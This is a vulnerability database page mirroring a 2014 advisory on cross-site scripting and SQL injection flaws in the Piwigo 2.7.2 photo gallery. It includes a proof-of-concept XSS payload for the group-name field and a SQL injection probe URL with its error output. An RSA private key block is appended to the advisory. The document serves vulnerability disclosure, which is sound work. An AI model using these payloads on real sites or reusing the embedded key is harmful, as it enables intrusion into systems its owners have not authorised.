Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Piwigo 2.7.2 Cross Site Scripting / SQL Injection

🗓️ 20 Dec 2014 00:00:00Reported by Taurus OmarType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 46 Views

Piwigo 2.7.2 Cross Site Scripting / SQL Injection vulnerability, high risk, CVE-2014-1470. Piwigo web photo gallery software. Code injection in group list and admin control panel

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Piwigo 2.4.6 Cross Site Request Forgery / Traversal Vulnerabilities
1 Mar 201300:00
zdt
0day.today		Piwigo 2.4.6 - Multiple Vulnerabilities
1 Mar 201300:00
zdt
0day.today		Piwigo 2.7.2 SQL Injection / Cross Site Scripting Vulnerabilities
20 Dec 201400:00
zdt
Tenable Nessus		BlackBerry 10.x < 10.2.1.1925 Authentication Bypass
15 Aug 201400:00
nessus
Tenable Nessus		FreeBSD : piwigo -- CSRF/Path Traversal (edd201a5-8fc3-11e2-b131-000c299b62e1)
20 Mar 201300:00
nessus
Tenable Nessus		Piwigo install.php dl Parameter Traversal Arbitrary File Access
2 Apr 201300:00
nessus
Circl		CVE-2013-1468
1 Mar 201300:00
circl
Circl		CVE-2013-1469
19 Feb 201300:00
circl
Check Point Advisories		Piwigo Photo Gallery Project install script Directory Traversal - Ver2 (CVE-2013-1469)
28 Dec 201400:00
checkpoint_advisories
CVE		CVE-2013-1468
12 Mar 201316:00
cve
Rows per page
` -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
INDEPENDENT SECURITY RESEARCHER   
PENETRATION TESTING SECURITY  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
  
# Exploit Title: Piwigo - SQL Injection / Cross Site Scripting Vulnerability's   
# Date: 19/12/2014  
# Url Vendor: http://www.piwigo.org/  
# Vendor Name: Piwigo   
# Version: 2.7.2  
# CVE: CVE-2014-1470  
# CVE References: CVE-2013-1468, CVE-2013-1469  
# Author: TaurusOmar   
# Tiwtter: @TaurusOmar_  
# Email: [email protected]  
# Home: overhat.blogspot.com  
# Tested On: Bugtraq Optimus  
# Risk: High  
  
  
Description  
Piwigo is a photo gallery software for the web that comes with powerful features to publish and manage your collection of pictures.  
  
  
------------------------  
+ CROSS SITE SCRIPTING +   
------------------------  
# Exploiting Description - Get into code xss in the box of group list.   
  
<fieldset>  
<legend>Add Group</legend><p>  
<strong>Name Group</strong><br>  
YOUR GROUP NAME O POC  
<input type="text" size="20" maxlength="50" name="groupname"></p>  
<p class="actionButtons">  
<input type="submit" value="Add" name="submit_add" class="submit">  
<a id="addGroupClose" href="#">Cancel</a></p>  
<input type="hidden" value="24322c55681c00da423a8a7b21b79640" name="pwg_token">  
</fieldset>  
  
#P0c  
"><img src=x onerror=prompt(1);>  
  
#Proof Concept  
http://i.imgur.com/qFyJz6q.jpg  
  
  
------------------------  
+ Sql Injection +  
------------------------  
# Exploiting Description - Sql Injection in control panel of admin and others users .   
  
#P0c  
http://site.com/piwigo/admin.php?page=history&search_id=5'  
  
SELECT  
date,  
time,  
user_id,  
IP,  
section,  
category_id,  
tag_ids,  
image_id,  
image_type  
FROM ucea_history  
WHERE   
; in /home/site.com/public_html/piwigo/include/dblayer/functions_mysqli.inc.php on line 830  
  
#Proof Concept  
http://i.imgur.com/wpzMmmu.jpg  
  
  
-----BEGIN RSA PRIVATE KEY-----  
MIICXQIBAAKBgQD995aYvrD2mK2fwwQr3FoAAprFLfMAiwR8cQUZW2XWDUSNJdvl  
Mq/1qym16+Yx7AVmXbsdCzqV/zeX+VUg6fUUWFwzNru6akjOlEHnSpNPxfJaCOEi  
2AFovRie8LJyXtmXf1VFVU7l33/OBUsGJAUa2H4bR8ChTUffSHqkoFLE5wIDAQAB  
AoGBANJgFc/RpqWfM7Pzx7DNh4AaqDpOJc19Wun6dU7b9y+pLe/+PHlP05Kdhp+8  
GaOg75gsbKNSeeVm1JZ/Y5UwOGJLn06W8PaBgkNG+b6tv9iRV7jSubEscwfGOXSX  
X5Hi9XP02MOrEsqOcgl6Xqpf8//fauhem8a4/iftk2hG3ngBAkEA/4C5QQePSOz/  
WyypDfUC5Nr5h32zq5bvRY++v7ydzeSRQD8uri66zZuz0gGTzjGdyBUb2OuTDT4R  
8RUcW1x9QQJBAP52GYGDg/+EE7ABX4zT/ZOHJScjlezxbwLiTsvWoESRUrQftLOL  
Wvl2IpeYpWvKIjTzyb5WH+IBWPFpM6RfsCcCQQDnqrDOrOsXhYSYB+uVMyYXmhEM  
8EYb/HQhj4+2THCNQoUNSvyphMduLJKkhTeei1B0HeetDRS9uh0Mika29CrBAkAM  
BVg/Hg9mSr8DWY1CAeHAzmma57t1bhJoeHhweLspghP+HmFS+gpaLpKDxtpJtUrY  
ZYvqSfdHnfitruKZqUuRAkAti8p7b53+cFSm14WPNtdhJQnxniUcSKBtNm5ExO7J  
X54eZI4iddc9xnP4rySfwz933FhMRF9Eh3gPUYAPBpp/  
-----END RSA PRIVATE KEY-----  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Dec 2014 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.45471
piwigocross site scriptingsql injectionvulnerabilityhigh riskcve-2014-1470web photo gallerycode injection
46